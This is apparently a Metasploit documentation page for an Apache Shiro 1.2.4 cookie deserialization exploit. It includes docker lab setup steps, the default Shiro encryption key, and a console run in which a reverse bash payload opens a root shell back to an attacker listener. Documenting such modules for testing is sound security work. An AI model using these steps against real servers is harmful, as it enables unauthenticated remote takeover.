adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md
T
Spencer McIntyre a227d00275 Add additional setup notes for some modules
2021-03-11 12:09:29 -06:00

2.9 KiB
Raw Blame History

Vulnerable Application

Description

Apache Shiro v1.2.4 is vulnerable to a Java deserialization vulnerability. An unauthenticated user can submit a YSoSerial payload to the Apache Shiro web server as the value to the rememberMe cookie. This will result in code execution in the context of the web server.

The YSoSerial CommonsCollections2 payload is known to work and is the one leveraged by this module.

Note that other versions of Apache Shiro may also be exploitable if the encryption key used by Shiro to encrypt rememberMe cookies is known.

Setup

You can use https://github.com/Medicean/VulApps/tree/master/s/shiro/1.

  1. Pull the docker image
    • docker pull medicean/vulapps:s_shiro_1
  2. Run the docker image, binding to port 8080
    • docker run --rm -p 8080:8080 medicean/vulapps:s_shiro_1

Verification Steps

  1. use exploit/multi/http/shiro_rememberme_v124_deserialize
  2. set rhosts <rhost>
  3. run

Options

ENC_KEY The encryption key the target Apache Shiro server is using to encrypt its rememberMe cookies.

Scenarios

Tested on GNU/Linux x86_64 using Shiro-1.2.4

msf6 > use exploit/multi/http/shiro_rememberme_v124_deserialize
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > show options

Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   ENC_KEY    kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                        yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                         yes       Base directory path
   VHOST                                no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command payload


msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > set RHOSTS 172.18.0.2
RHOSTS => 172.18.0.2
msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > run

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:60632) at 2020-12-21 17:09:27 -0600

whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
Reference in New Issue View Git Blame Copy Permalink